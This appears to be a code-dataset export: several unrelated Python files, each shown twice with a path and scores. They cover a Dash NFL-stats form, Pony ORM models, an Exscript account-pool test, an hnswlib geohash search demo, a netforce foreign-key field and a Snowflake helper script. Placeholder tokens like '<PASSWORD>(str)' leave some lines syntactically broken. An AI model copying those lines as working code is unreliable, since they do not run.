id='completions_per_year',
placeholder='AVG: 178',
type='number',
value=178
),
dcc.Markdown('#### Passing Yards per Season'),
dcc.Input(
id='yards_per_year',
placeholder='AVG: 2194',
type='number',
value=2194
),
dcc.Markdown('#### Passes per Year'),
dcc.Input(
id='passes_per_year',
placeholder='AVG: 211',
type='number',
value=211
),
dcc.Markdown('#### Passing TDs per Season'),
dcc.Input(
id='tds_per_year',
placeholder='AVG: 15',
type='number',
value=15
),
dcc.Markdown('#### Interceptions per Season'),
dcc.Input(
id='ints_per_year',
placeholder='AVG: 8',
type='number',
value=8
),
dcc.Markdown('#### Height (in)'),
dcc.Input(
id='height',
placeholder='AVG: 74',
type='number',
value=74
),
dcc.Markdown('#### Weight (lb)'),
dcc.Input(
id='weight',
placeholder='AVG: 222 lbs',
type='number',
value=222
),
dcc.Markdown('#### 40 Time'),
dcc.Input(
id='forty_yard_dash',
placeholder='AVG: 4.87 Seconds',
type='number',
value=4.87
),
dcc.Markdown('#### Vertical Leap (in)'),
dcc.Input(
id='vert_leap',
placeholder='AVG: 24 inches',
type='number',
value=24
),
dcc.Markdown('#### 3-Cone Drill'),
dcc.Input(
id='three_cone',
placeholder='AVG: 7.34 Seconds',
type='number',
value=7.34
),
dcc.Markdown('#### Broad Jump'),
dcc.Input(
id='broad_jump',
placeholder='AVG: 106 inches',
type='number',
value=106
),
dcc.Markdown('#### Shuttle Run'),
dcc.Input(
id='shuttle_run',
placeholder='AVG: 4.46 Seconds',
type='number',
value=4.46
),
],
md=4,
)
column2 = dbc.Col(
[
dcc.Markdown('#### Games Played'),
dcc.Input(
id='games_played',
placeholder='AVG: 32 Games',
type='number',
value=32
),
dcc.Markdown('#### Total Passing Completions'),
dcc.Input(
id='passing_completions',
placeholder='AVG: 563',
type='number',
value=563
),
dcc.Markdown('#### Total Passing Attempts'),
dcc.Input(
id='passing_attempts',
placeholder='AVG: 939',
type='number',
value=939
),
dcc.Markdown('#### Career Passing Percentage'),
dcc.Input(
id='passing_percentage',
placeholder='AVG: 59.2',
type='number',
value=59.2
),
dcc.Markdown('#### Total Passing Yards'),
dcc.Input(
id='passing_yards',
placeholder='AVG: 6900',
type='number',
value=6900
),
dcc.Markdown('#### Total Passing TDs'),
dcc.Input(
id='passing_tds',
placeholder='AVG: 49',
type='number',
value=49
),
dcc.Markdown('#### Total Interceptions'),
dcc.Input(
id='passing_ints',
placeholder='AVG: 26',
type='number',
value=26
),
dcc.Markdown('#### Career Passer Rating'),
dcc.Input(
id='passer_rating',
placeholder='AVG: 131',
type='number',
value=131
),
dcc.Markdown('#### Wins per Year'),
dcc.Slider(
id='wins_per_year',
min=0,
max=12,
step=13,
value=5,
marks={n: str(n) for n in range(0,13,1)},
className='mb-5',
),
dcc.Markdown('#### Conference Championships Won'),
dcc.Slider(
id='conference_championships',
min=0,
max=4,
step=4,
value=0,
marks={n: str(n) for n in range(0,5,1)},
className='mb-5',
),
dcc.Markdown('#### Attended Combine'),
dcc.Dropdown(
id='no_combine_attendance',
options = [
{'label': 'Yes', 'value': 0},
{'label': 'No', 'value': 1},
],
value = 0,
className='mb-5',
),
dcc.Markdown('#### Power 5 Conference'),
dcc.Dropdown(
id='power_five_conf',
options = [
{'label': 'Yes', 'value': 1},
{'label': 'No', 'value': 0},
],
value = 1,
className='mb-5',
),
],
md=4,
)
column3 = dbc.Col(
[
html.H2('Expected NFL Starts per Season', className='mb-5'),
html.Div(id='prediction-content', className='lead')
]
)
layout = dbc.Row([column1, column2, column3]) | 0.46952 | 0.181046 |
from pony.orm import Required, Database, Set, Optional, Json
from flask_login import UserMixin
from datetime import datetime
from enum import Enum
from pony.orm.dbapiprovider import StrConverter
from dinamit.core.constants import DomainCategory, DomainAction
from flask import request, url_for
db = Database()
class EnumConverter(StrConverter):
def validate(self, val, obj=None):
if not isinstance(val, Enum):
raise ValueError('Instance must be Enum type. Got: {}'.format(type(val)))
return val
def py2sql(self, val):
return val.name
def sql2py(self, val):
return self.py_type[val]
class Client(db.Entity, UserMixin):
first_name = Required(str)
last_name = Required(str)
email = Required(str, unique=True)
password = <PASSWORD>(str)
is_active = Required(bool, default=lambda: True)
assets = Set('Asset')
rules = Required(Json, default=lambda: {})
policy = Required(Json, default=lambda: {})
queries = Set('Query')
created_at = Optional(datetime, default=lambda: datetime.now())
last_login = Optional(datetime)
@property
def full_name(self):
return '{} {}'.format(
self.first_name, self.last_name
)
class Asset(db.Entity):
name = Required(str)
ip = Required(str, unique=True)
is_verified = Required(bool, default=lambda: True)
verification_hash = Optional(str)
client = Required(Client)
queries = Set('Query')
created_at = Required(datetime, default=lambda: datetime.now())
@property
def get_verification_url(self):
return '{}{}'.format(
request.host, url_for('asset.verify', verification_hash=self.verification_hash)
)
class Domain(db.Entity):
name = Required(str)
category = Required(DomainCategory)
queries = Set('Query')
is_subdomain = Required(bool, default=lambda: False)
created_at = Required(datetime, default=lambda: datetime.now())
class Query(db.Entity):
domain = Optional(Domain)
request = Required(str)
dns_type = Required(str)
action = Required(DomainAction)
reason = Required(str)
client = Required(Client)
asset = Optional(Asset)
created_at = Required(datetime, default=lambda: datetime.now()) | dinamit/core/models.py | from pony.orm import Required, Database, Set, Optional, Json
from flask_login import UserMixin
from datetime import datetime
from enum import Enum
from pony.orm.dbapiprovider import StrConverter
from dinamit.core.constants import DomainCategory, DomainAction
from flask import request, url_for
db = Database()
class EnumConverter(StrConverter):
def validate(self, val, obj=None):
if not isinstance(val, Enum):
raise ValueError('Instance must be Enum type. Got: {}'.format(type(val)))
return val
def py2sql(self, val):
return val.name
def sql2py(self, val):
return self.py_type[val]
class Client(db.Entity, UserMixin):
first_name = Required(str)
last_name = Required(str)
email = Required(str, unique=True)
password = <PASSWORD>(str)
is_active = Required(bool, default=lambda: True)
assets = Set('Asset')
rules = Required(Json, default=lambda: {})
policy = Required(Json, default=lambda: {})
queries = Set('Query')
created_at = Optional(datetime, default=lambda: datetime.now())
last_login = Optional(datetime)
@property
def full_name(self):
return '{} {}'.format(
self.first_name, self.last_name
)
class Asset(db.Entity):
name = Required(str)
ip = Required(str, unique=True)
is_verified = Required(bool, default=lambda: True)
verification_hash = Optional(str)
client = Required(Client)
queries = Set('Query')
created_at = Required(datetime, default=lambda: datetime.now())
@property
def get_verification_url(self):
return '{}{}'.format(
request.host, url_for('asset.verify', verification_hash=self.verification_hash)
)
class Domain(db.Entity):
name = Required(str)
category = Required(DomainCategory)
queries = Set('Query')
is_subdomain = Required(bool, default=lambda: False)
created_at = Required(datetime, default=lambda: datetime.now())
class Query(db.Entity):
domain = Optional(Domain)
request = Required(str)
dns_type = Required(str)
action = Required(DomainAction)
reason = Required(str)
client = Required(Client)
asset = Optional(Asset)
created_at = Required(datetime, default=lambda: datetime.now()) | 0.780997 | 0.18352 |
from builtins import range
import sys
import unittest
import re
import os.path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
from Exscript import Account
from Exscript.account import AccountPool
from Exscript.util.file import get_accounts_from_file
class AccountPoolTest(unittest.TestCase):
CORRELATE = AccountPool
def setUp(self):
self.user1 = 'testuser1'
self.password1 = '<PASSWORD>'
self.account1 = Account(self.user1, self.password1)
self.user2 = 'testuser2'
self.password2 = '<PASSWORD>'
self.account2 = Account(self.user2, self.password2)
self.accm = AccountPool()
def testConstructor(self):
accm = AccountPool()
self.assertEqual(accm.n_accounts(), 0)
accm = AccountPool([self.account1, self.account2])
self.assertEqual(accm.n_accounts(), 2)
def testAddAccount(self):
self.assertEqual(self.accm.n_accounts(), 0)
self.accm.add_account(self.account1)
self.assertEqual(self.accm.n_accounts(), 1)
self.accm.add_account(self.account2)
self.assertEqual(self.accm.n_accounts(), 2)
def testReset(self):
self.testAddAccount()
self.accm.reset()
self.assertEqual(self.accm.n_accounts(), 0)
def testHasAccount(self):
self.assertEqual(self.accm.has_account(self.account1), False)
self.accm.add_account(self.account1)
self.assertEqual(self.accm.has_account(self.account1), True)
def testGetAccountFromHash(self):
account = Account('user', 'test')
thehash = account.__hash__()
self.accm.add_account(account)
self.assertEqual(self.accm.get_account_from_hash(thehash), account)
def testGetAccountFromName(self):
self.testAddAccount()
self.assertEqual(self.account2,
self.accm.get_account_from_name(self.user2))
def testNAccounts(self):
self.testAddAccount()
def testAcquireAccount(self):
self.testAddAccount()
self.accm.acquire_account(self.account1)
self.account1.release()
self.accm.acquire_account(self.account1)
self.account1.release()
# Add three more accounts.
filename = os.path.join(os.path.dirname(__file__), 'account_pool.cfg')
self.accm.add_account(get_accounts_from_file(filename))
self.assertEqual(self.accm.n_accounts(), 5)
for _ in range(2000):
# Each time an account is acquired a different one should be
# returned.
acquired = {}
for _ in range(5):
account = self.accm.acquire_account()
self.assertTrue(account is not None)
self.assertNotIn(account.get_name(), acquired)
acquired[account.get_name()] = account
# Release one account.
acquired['abc'].release()
# Acquire one account.
account = self.accm.acquire_account()
self.assertEqual(account.get_name(), 'abc')
# Release all accounts.
for account in list(acquired.values()):
account.release()
def testReleaseAccounts(self):
account1 = Account('foo')
account2 = Account('bar')
pool = AccountPool()
pool.add_account(account1)
pool.add_account(account2)
pool.acquire_account(account1, 'one')
pool.acquire_account(account2, 'two')
self.assertNotIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('one')
self.assertIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('one')
self.assertIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('two')
self.assertIn(account1, pool.unlocked_accounts)
self.assertIn(account2, pool.unlocked_accounts)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(AccountPoolTest)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite()) | tests/Exscript/AccountPoolTest.py | from builtins import range
import sys
import unittest
import re
import os.path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
from Exscript import Account
from Exscript.account import AccountPool
from Exscript.util.file import get_accounts_from_file
class AccountPoolTest(unittest.TestCase):
CORRELATE = AccountPool
def setUp(self):
self.user1 = 'testuser1'
self.password1 = '<PASSWORD>'
self.account1 = Account(self.user1, self.password1)
self.user2 = 'testuser2'
self.password2 = '<PASSWORD>'
self.account2 = Account(self.user2, self.password2)
self.accm = AccountPool()
def testConstructor(self):
accm = AccountPool()
self.assertEqual(accm.n_accounts(), 0)
accm = AccountPool([self.account1, self.account2])
self.assertEqual(accm.n_accounts(), 2)
def testAddAccount(self):
self.assertEqual(self.accm.n_accounts(), 0)
self.accm.add_account(self.account1)
self.assertEqual(self.accm.n_accounts(), 1)
self.accm.add_account(self.account2)
self.assertEqual(self.accm.n_accounts(), 2)
def testReset(self):
self.testAddAccount()
self.accm.reset()
self.assertEqual(self.accm.n_accounts(), 0)
def testHasAccount(self):
self.assertEqual(self.accm.has_account(self.account1), False)
self.accm.add_account(self.account1)
self.assertEqual(self.accm.has_account(self.account1), True)
def testGetAccountFromHash(self):
account = Account('user', 'test')
thehash = account.__hash__()
self.accm.add_account(account)
self.assertEqual(self.accm.get_account_from_hash(thehash), account)
def testGetAccountFromName(self):
self.testAddAccount()
self.assertEqual(self.account2,
self.accm.get_account_from_name(self.user2))
def testNAccounts(self):
self.testAddAccount()
def testAcquireAccount(self):
self.testAddAccount()
self.accm.acquire_account(self.account1)
self.account1.release()
self.accm.acquire_account(self.account1)
self.account1.release()
# Add three more accounts.
filename = os.path.join(os.path.dirname(__file__), 'account_pool.cfg')
self.accm.add_account(get_accounts_from_file(filename))
self.assertEqual(self.accm.n_accounts(), 5)
for _ in range(2000):
# Each time an account is acquired a different one should be
# returned.
acquired = {}
for _ in range(5):
account = self.accm.acquire_account()
self.assertTrue(account is not None)
self.assertNotIn(account.get_name(), acquired)
acquired[account.get_name()] = account
# Release one account.
acquired['abc'].release()
# Acquire one account.
account = self.accm.acquire_account()
self.assertEqual(account.get_name(), 'abc')
# Release all accounts.
for account in list(acquired.values()):
account.release()
def testReleaseAccounts(self):
account1 = Account('foo')
account2 = Account('bar')
pool = AccountPool()
pool.add_account(account1)
pool.add_account(account2)
pool.acquire_account(account1, 'one')
pool.acquire_account(account2, 'two')
self.assertNotIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('one')
self.assertIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('one')
self.assertIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('two')
self.assertIn(account1, pool.unlocked_accounts)
self.assertIn(account2, pool.unlocked_accounts)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(AccountPoolTest)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite()) | 0.358802 | 0.271016 |
import numpy as np
import tqdm
import geohash
import hnswlib
import random
import sys
from collections import defaultdict
base_alphabet = '0123456789abcdefghijklmnopqrstuv'
geo_alphabet = '0123456789bcdefghjkmnpqrstuvwxyz'
trantab = str.maketrans(geo_alphabet, base_alphabet)
def cosine_similarity(vector, matrix):
return (np.sum(vector * matrix, axis=1) / (
np.sqrt(np.sum(matrix ** 2, axis=1)) * np.sqrt(np.sum(vector ** 2))))
# The library can only use int as a tag. So we need to convert geohash into integer first
def geohash2int(geo: str) -> int:
"""
Converts geohash string into integer
"""
return int(geo.translate(trantab), 32)
def get_random_vector(dim):
return np.float32(np.random.random((1, dim)))
def get_random_point(from_lat, to_lat, from_lon, to_lon):
lat = random.uniform(from_lat, to_lat)
lon = random.uniform(from_lon, to_lon)
return lat, lon
def get_random_data(num_points, dim, from_lat, to_lat, from_lon, to_lon):
points = np.random.rand(num_points, dim)
geo_points = [get_random_point(from_lat, to_lat, from_lon, to_lon) for _ in range(num_points)]
return points, geo_points
if __name__ == "__main__":
from_lat, to_lat = 52.4245, 52.6176
from_lon, to_lon = 13.1870, 13.5997
dim = 25
elements = 100_000
max_precision = 6 # Minimal searchable precision. Precision of 6 is ~ 0.61 km
# https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
hnsw = hnswlib.Index(space='cosine', dim=dim)
hnsw.init_index(max_elements = elements, M = 16, random_seed=45)
hnsw.set_num_threads(2)
# Generate random vectors and geo points
points, geo_points = get_random_data(elements, dim, from_lat, to_lat, from_lon, to_lon)
hnsw.add_items(points)
tags_to_index = defaultdict(int)
tags_to_ids = defaultdict(list)
# Collect geohashes for indexing
for idx, geo_point in enumerate(geo_points):
lat, lon = geo_point
ghsh = geohash.encode(lat, lon, precision=max_precision)
# List all hashes in hierarchy: 'u337jk' -> ['u', 'u3', 'u33', 'u337', 'u337j', 'u337jk']
tags = [ghsh[:i + 1] for i in range(max_precision)]
# Save small geohash indexes with further indexing
tags_to_index[ghsh[:max_precision]] += 1
tags_to_index[ghsh[:max_precision - 1]] += 1
# Assign geotags to points
for tag in tags:
tags_to_ids[tag].append(idx)
hnsw.add_tags([idx], geohash2int(tag))
# Additionally index points inside small regions
for tag in tqdm.tqdm(tags_to_index):
# This will create additional links in a graph for each geohash region.
# So search should work on nodes inside this region only.
hnsw.index_tagged(geohash2int(tag))
# With M=16 additional indexing is only required for regions containing less than ~5% of all points
# Additional info here: https://comprehension.ml/posts/categorical-hnsw/
for tag in tqdm.tqdm(tags_to_index):
# This code will also create additional connections between points in neighbor regions.
# So search in multiple neighbor regions will also work
neighbors = [geohash2int(ntag) for ntag in geohash.neighbors(tag) if ntag in tags_to_index]
hnsw.index_cross_tagged(neighbors)
# Performing query
target_query = get_random_vector(dim)
# Hash precision defines radius of a seearch. Precision of 5 is ~ 2.4Km
# https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
target_precision = 5
target_lat, target_lon = 52.5175, 13.3937
# Generate integer tag from geohash
target_ghsh = geohash.encode(target_lat, target_lon, precision=target_precision)
target_tag = geohash2int(target_ghsh)
# Obtain search condition from geohash
# You can also search in multiple squares with conjunction:
# [[(False, hash1), (False, hash2), ..., (False, hashN)]]
condition = [[(False, target_tag)]]
found, dist = hnsw.knn_query(target_query, k=3, conditions=condition)
print(found, dist)
# Check search precision with brutforce approach
true_distance = 1 - cosine_similarity(target_query, points)
mask = np.zeros(elements, dtype=bool)
mask[tags_to_ids[target_ghsh]] = True # Search in given geo-region only
np.putmask(true_distance, ~mask, 1_000_000)
closest = list(np.argsort(true_distance)) # Closest by mask
print(closest[:3], true_distance[closest[:3]]) | examples/geo_example.py | import numpy as np
import tqdm
import geohash
import hnswlib
import random
import sys
from collections import defaultdict
base_alphabet = '0123456789abcdefghijklmnopqrstuv'
geo_alphabet = '0123456789bcdefghjkmnpqrstuvwxyz'
trantab = str.maketrans(geo_alphabet, base_alphabet)
def cosine_similarity(vector, matrix):
return (np.sum(vector * matrix, axis=1) / (
np.sqrt(np.sum(matrix ** 2, axis=1)) * np.sqrt(np.sum(vector ** 2))))
# The library can only use int as a tag. So we need to convert geohash into integer first
def geohash2int(geo: str) -> int:
"""
Converts geohash string into integer
"""
return int(geo.translate(trantab), 32)
def get_random_vector(dim):
return np.float32(np.random.random((1, dim)))
def get_random_point(from_lat, to_lat, from_lon, to_lon):
lat = random.uniform(from_lat, to_lat)
lon = random.uniform(from_lon, to_lon)
return lat, lon
def get_random_data(num_points, dim, from_lat, to_lat, from_lon, to_lon):
points = np.random.rand(num_points, dim)
geo_points = [get_random_point(from_lat, to_lat, from_lon, to_lon) for _ in range(num_points)]
return points, geo_points
if __name__ == "__main__":
from_lat, to_lat = 52.4245, 52.6176
from_lon, to_lon = 13.1870, 13.5997
dim = 25
elements = 100_000
max_precision = 6 # Minimal searchable precision. Precision of 6 is ~ 0.61 km
# https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
hnsw = hnswlib.Index(space='cosine', dim=dim)
hnsw.init_index(max_elements = elements, M = 16, random_seed=45)
hnsw.set_num_threads(2)
# Generate random vectors and geo points
points, geo_points = get_random_data(elements, dim, from_lat, to_lat, from_lon, to_lon)
hnsw.add_items(points)
tags_to_index = defaultdict(int)
tags_to_ids = defaultdict(list)
# Collect geohashes for indexing
for idx, geo_point in enumerate(geo_points):
lat, lon = geo_point
ghsh = geohash.encode(lat, lon, precision=max_precision)
# List all hashes in hierarchy: 'u337jk' -> ['u', 'u3', 'u33', 'u337', 'u337j', 'u337jk']
tags = [ghsh[:i + 1] for i in range(max_precision)]
# Save small geohash indexes with further indexing
tags_to_index[ghsh[:max_precision]] += 1
tags_to_index[ghsh[:max_precision - 1]] += 1
# Assign geotags to points
for tag in tags:
tags_to_ids[tag].append(idx)
hnsw.add_tags([idx], geohash2int(tag))
# Additionally index points inside small regions
for tag in tqdm.tqdm(tags_to_index):
# This will create additional links in a graph for each geohash region.
# So search should work on nodes inside this region only.
hnsw.index_tagged(geohash2int(tag))
# With M=16 additional indexing is only required for regions containing less than ~5% of all points
# Additional info here: https://comprehension.ml/posts/categorical-hnsw/
for tag in tqdm.tqdm(tags_to_index):
# This code will also create additional connections between points in neighbor regions.
# So search in multiple neighbor regions will also work
neighbors = [geohash2int(ntag) for ntag in geohash.neighbors(tag) if ntag in tags_to_index]
hnsw.index_cross_tagged(neighbors)
# Performing query
target_query = get_random_vector(dim)
# Hash precision defines radius of a seearch. Precision of 5 is ~ 2.4Km
# https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
target_precision = 5
target_lat, target_lon = 52.5175, 13.3937
# Generate integer tag from geohash
target_ghsh = geohash.encode(target_lat, target_lon, precision=target_precision)
target_tag = geohash2int(target_ghsh)
# Obtain search condition from geohash
# You can also search in multiple squares with conjunction:
# [[(False, hash1), (False, hash2), ..., (False, hashN)]]
condition = [[(False, target_tag)]]
found, dist = hnsw.knn_query(target_query, k=3, conditions=condition)
print(found, dist)
# Check search precision with brutforce approach
true_distance = 1 - cosine_similarity(target_query, points)
mask = np.zeros(elements, dtype=bool)
mask[tags_to_ids[target_ghsh]] = True # Search in given geo-region only
np.putmask(true_distance, ~mask, 1_000_000)
closest = list(np.argsort(true_distance)) # Closest by mask
print(closest[:3], true_distance[closest[:3]]) | 0.609757 | 0.48749 |
from .field import Field
from netforce import database
import netforce.model
class Many2One(Field):
def __init__(self, relation, string, condition=None, on_delete=None, **kw):
super(Many2One, self).__init__(string=string, index=True, **kw)
self.on_delete = on_delete or "set_null"
self.relation = relation
self.condition = condition
if self.store:
self.eager_load = True
def update_db(self):
super(Many2One, self).update_db()
m = netforce.model.get_model(self.model)
if not m._table or not self.store:
return
db = database.get_connection()
schema = database.get_active_schema() or "public"
fkname = m._table + "_" + self.name + "_fk"
if self.on_delete == "restrict":
delete_rule = "r"
on_delete_sql = "RESTRICT"
elif self.on_delete == "no_action":
delete_rule = "a"
on_delete_sql = "NO_ACTION"
elif self.on_delete == "cascade":
delete_rule = "c"
on_delete_sql = "CASCADE"
elif self.on_delete == "set_null":
delete_rule = "n"
on_delete_sql = "SET NULL"
elif self.on_delete == "set_default":
delete_rule = "d"
on_delete_sql = "SET DEFAULT"
else:
raise Exception("Invalid on_delete on %s.%s (%s)" % (m._name, self.name, self.on_delete))
mr = netforce.model.get_model(self.relation)
if not mr:
raise Exception("Relation model '%s' does not exist" % self.relation)
drop_fk = False
add_fk = False
res = db.get(
"SELECT r.relname,c.confdeltype FROM pg_constraint c,pg_class r JOIN pg_catalog.pg_namespace n ON n.oid=r.relnamespace WHERE c.conname=%s AND r.oid=c.confrelid AND n.nspname=%s", fkname, schema)
if not res:
print("adding foreign key %s.%s" % (self.model, self.name))
drop_fk = False
add_fk = True
else:
if res.confdeltype != delete_rule or res.relname != mr._table:
print("changing foreign key %s.%s" % (self.model, self.name))
print(" delete_rule: %s -> %s" % (res.confdeltype, delete_rule))
print(" relation: %s -> %s" % (res.relname, mr._table))
drop_fk = True
add_fk = True
if drop_fk:
db.execute("ALTER TABLE %s DROP CONSTRAINT %s" % (m._table, fkname))
if add_fk:
q = "ALTER TABLE %s ADD CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s (id)" % (
m._table, fkname, self.name, mr._table)
if self.on_delete:
q += " ON DELETE %s" % on_delete_sql
print(q)
db.execute(q)
def get_col_type(self):
return "int4"
def get_meta(self, context={}):
vals = super(Many2One, self).get_meta(context=context)
vals["type"] = "many2one"
vals["relation"] = self.relation
return vals | netforce/netforce/model/fields/many2one.py |
from .field import Field
from netforce import database
import netforce.model
class Many2One(Field):
def __init__(self, relation, string, condition=None, on_delete=None, **kw):
super(Many2One, self).__init__(string=string, index=True, **kw)
self.on_delete = on_delete or "set_null"
self.relation = relation
self.condition = condition
if self.store:
self.eager_load = True
def update_db(self):
super(Many2One, self).update_db()
m = netforce.model.get_model(self.model)
if not m._table or not self.store:
return
db = database.get_connection()
schema = database.get_active_schema() or "public"
fkname = m._table + "_" + self.name + "_fk"
if self.on_delete == "restrict":
delete_rule = "r"
on_delete_sql = "RESTRICT"
elif self.on_delete == "no_action":
delete_rule = "a"
on_delete_sql = "NO_ACTION"
elif self.on_delete == "cascade":
delete_rule = "c"
on_delete_sql = "CASCADE"
elif self.on_delete == "set_null":
delete_rule = "n"
on_delete_sql = "SET NULL"
elif self.on_delete == "set_default":
delete_rule = "d"
on_delete_sql = "SET DEFAULT"
else:
raise Exception("Invalid on_delete on %s.%s (%s)" % (m._name, self.name, self.on_delete))
mr = netforce.model.get_model(self.relation)
if not mr:
raise Exception("Relation model '%s' does not exist" % self.relation)
drop_fk = False
add_fk = False
res = db.get(
"SELECT r.relname,c.confdeltype FROM pg_constraint c,pg_class r JOIN pg_catalog.pg_namespace n ON n.oid=r.relnamespace WHERE c.conname=%s AND r.oid=c.confrelid AND n.nspname=%s", fkname, schema)
if not res:
print("adding foreign key %s.%s" % (self.model, self.name))
drop_fk = False
add_fk = True
else:
if res.confdeltype != delete_rule or res.relname != mr._table:
print("changing foreign key %s.%s" % (self.model, self.name))
print(" delete_rule: %s -> %s" % (res.confdeltype, delete_rule))
print(" relation: %s -> %s" % (res.relname, mr._table))
drop_fk = True
add_fk = True
if drop_fk:
db.execute("ALTER TABLE %s DROP CONSTRAINT %s" % (m._table, fkname))
if add_fk:
q = "ALTER TABLE %s ADD CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s (id)" % (
m._table, fkname, self.name, mr._table)
if self.on_delete:
q += " ON DELETE %s" % on_delete_sql
print(q)
db.execute(q)
def get_col_type(self):
return "int4"
def get_meta(self, context={}):
vals = super(Many2One, self).get_meta(context=context)
vals["type"] = "many2one"
vals["relation"] = self.relation
return vals | 0.482429 | 0.077239 |
VERSION = "20210720 2217 "
import datetime
import humanize
import numpy as np
import os
import pandas as pd
import plotly.express as px
import pyperclip
import re
import sidetable
import snowflake.connector
import time
from snowflake.connector.pandas_tools import write_pandas
from dotenv import load_dotenv
_ = load_dotenv()
# Get non-null counts
pd.options.display.max_info_rows = 16907850
# Connection string
conn = snowflake.connector.connect(
user=os.getenv('user'),
password=<PASSWORD>('password'),
account=os.getenv('account'),
warehouse=os.getenv('warehouse'),
database=os.getenv('database'),
schema=os.getenv('schema')
)
# Execute a statement that will generate a result set.
cur = conn.cursor()
def compare_sets(list1, list2):
"""Make a count of the intersections of two sets, A and B"""
set1 = set(list1)
set2 = set(list2)
set2_intersection_set1 = set2.intersection(set1)
result = {'IN A':[len(set1), len(set2_intersection_set1), round(len(set1)/len(set1)*100,1), round(len(set2_intersection_set1)/len(set2)*100,1)]}
result['IN B'] = [len(set2_intersection_set1), len(set2), round(len(set2_intersection_set1)/len(set1)*100,1), round(len(set2)/len(set2)*100,1)]
result['NOT IN A'] = [0, len(set2 - set1), 0, round(len(set2 - set1)/len(set2)*100,1)]
result['NOT IN B'] = [len(set1 - set2), 0, round(len(set1 - set2)/len(set1)*100,1), 0]
df = pd.DataFrame.from_dict(result, orient='index', columns=['A', 'B', '% of A', '% of B'])
return df
def d(vars):
"""List of variables starting with string "df" in reverse order. Usage: d(dir())
@vars list of variables output by dir() command
"""
list_of_dfs = [item for item in vars if (item.find('df') == 0 and item.find('_') == -1 and item != 'dfs')]
list_of_dfs.sort(key=lambda x:int(re.sub("[^0-9]", "", x.replace('df',''))) if len(x) > 2 else 0, reverse=True)
return list_of_dfs
def e(start_time):
"""Return human readable time delta
@start_time time to compare to current time
"""
print(f'Time now: {datetime.datetime.now().strftime("%Y-%m-%d %H:%M")}')
print(f"Time since start: {humanize.naturaldelta(time.monotonic() - start_time)}")
def execute(sql):
"""Execute a SQL command"""
start_time = time.monotonic()
_ = cur.execute(sql)
end_time = time.monotonic()
elapsed = end_time - start_time
print(f"Elapsed time {elapsed:.2f}")
return
def find_col_with(df, char_to_find):
"""Return column index of first column containing char_to_find
@char_to_find character to search for in column name
"""
first_column_with_char_to_find = [col for col in df.columns if col.find(char_to_find) > -1][0]
return list(df.columns).index(first_column_with_char_to_find)
def find_max_order(df, start_col=1):
"""Find the max value in each column and use it to put columns in rank order
@start_col Index of starting column (typically 1 as first column -- column 0 -- is a date or label)
"""
return list(df[df.columns[start_col:]].max().sort_values(ascending=False).keys())
def find_percentage_total(df, start_col=1):
"""Find total and percent of total for columns of Pandas dataframe
@start_col Index of starting column (typically 1 as first column -- column 0 -- is a date or label)
"""
# Get values for col1,col2 and col3
total = pd.Series(data=np.zeros(len(df)))
col_count = len(df.columns)
for i in range(start_col, col_count):
total += df.iloc[:,i]
df.insert(len(df.columns), 'total', total)
for i in range(start_col, col_count + 1):
pct_of_total = round((df.iloc[:,i]/total)*100, 2)
# Create Pandas DF with new column of pct_of_total
df.insert(len(df.columns),f"{df.columns[i]} %", pct_of_total)
# Pull original dataframe to show total and %
return df
def query(sql):
"""Run a SQL query and fetch result into Pandas DataFrame"""
start_time = time.monotonic()
_ = cur.execute(sql)
df = cur.fetch_pandas_all()
end_time = time.monotonic()
elapsed = end_time - start_time
print(f"Elapsed time {elapsed:.2f}")
return df
def t(title_string):
"""Add "as at {today}" to title. Usage: t(title_sting)
@title_string text to preceed the "as at" part
"""
today = datetime.datetime.today().strftime('%d %b %Y')
title = f"{title_string} as at {today}"
print(title)
pyperclip.copy(title)
print("(now on clipboard)")
return title
start_time = time.monotonic()
print(f"Setup Complete v {VERSION}") | setup.py |
VERSION = "20210720 2217 "
import datetime
import humanize
import numpy as np
import os
import pandas as pd
import plotly.express as px
import pyperclip
import re
import sidetable
import snowflake.connector
import time
from snowflake.connector.pandas_tools import write_pandas
from dotenv import load_dotenv
_ = load_dotenv()
# Get non-null counts
pd.options.display.max_info_rows = 16907850
# Connection string
conn = snowflake.connector.connect(
user=os.getenv('user'),
password=<PASSWORD>('password'),
account=os.getenv('account'),
warehouse=os.getenv('warehouse'),
database=os.getenv('database'),
schema=os.getenv('schema')
)
# Execute a statement that will generate a result set.
cur = conn.cursor()
def compare_sets(list1, list2):
"""Make a count of the intersections of two sets, A and B"""
set1 = set(list1)
set2 = set(list2)
set2_intersection_set1 = set2.intersection(set1)
result = {'IN A':[len(set1), len(set2_intersection_set1), round(len(set1)/len(set1)*100,1), round(len(set2_intersection_set1)/len(set2)*100,1)]}
result['IN B'] = [len(set2_intersection_set1), len(set2), round(len(set2_intersection_set1)/len(set1)*100,1), round(len(set2)/len(set2)*100,1)]
result['NOT IN A'] = [0, len(set2 - set1), 0, round(len(set2 - set1)/len(set2)*100,1)]
result['NOT IN B'] = [len(set1 - set2), 0, round(len(set1 - set2)/len(set1)*100,1), 0]
df = pd.DataFrame.from_dict(result, orient='index', columns=['A', 'B', '% of A', '% of B'])
return df
def d(vars):
"""List of variables starting with string "df" in reverse order. Usage: d(dir())
@vars list of variables output by dir() command
"""
